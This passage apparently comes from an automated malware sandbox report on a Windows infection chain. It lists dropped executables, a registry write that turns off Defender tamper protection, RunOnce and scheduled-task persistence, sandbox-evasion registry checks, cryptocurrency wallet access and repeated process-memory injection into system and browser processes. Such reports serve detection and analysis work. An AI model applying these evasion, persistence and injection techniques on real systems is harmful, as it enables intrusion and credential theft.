N/A N/A C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E0BB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2hH861vm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ECF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B35F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B8D0.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wvtwddb N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kx4St2pf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IB0tc6CQ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ok8bG1wv.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FG2wS5ol.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\A9D7.exe N/A

Checks installed software on the system

discovery

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\DE3A.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B8D0.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1844 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 1844 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 1844 wrote to memory of 4904 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe
PID 4904 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 4904 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 4904 wrote to memory of 324 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe
PID 324 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 324 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4904 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe
PID 4904 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe
PID 4904 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3300 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b2344812.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1844 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe
PID 1844 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe
PID 1844 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe
PID 4180 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe C:\Windows\system32\cmd.exe
PID 4180 wrote to memory of 4920 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c3763208.exe C:\Windows\system32\cmd.exe
PID 4920 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4920 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4920 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4920 wrote to memory of 2616 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 2288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 2288 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2616 wrote to memory of 1648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2616 wrote to memory of 1648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2896 wrote to memory of 5072 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
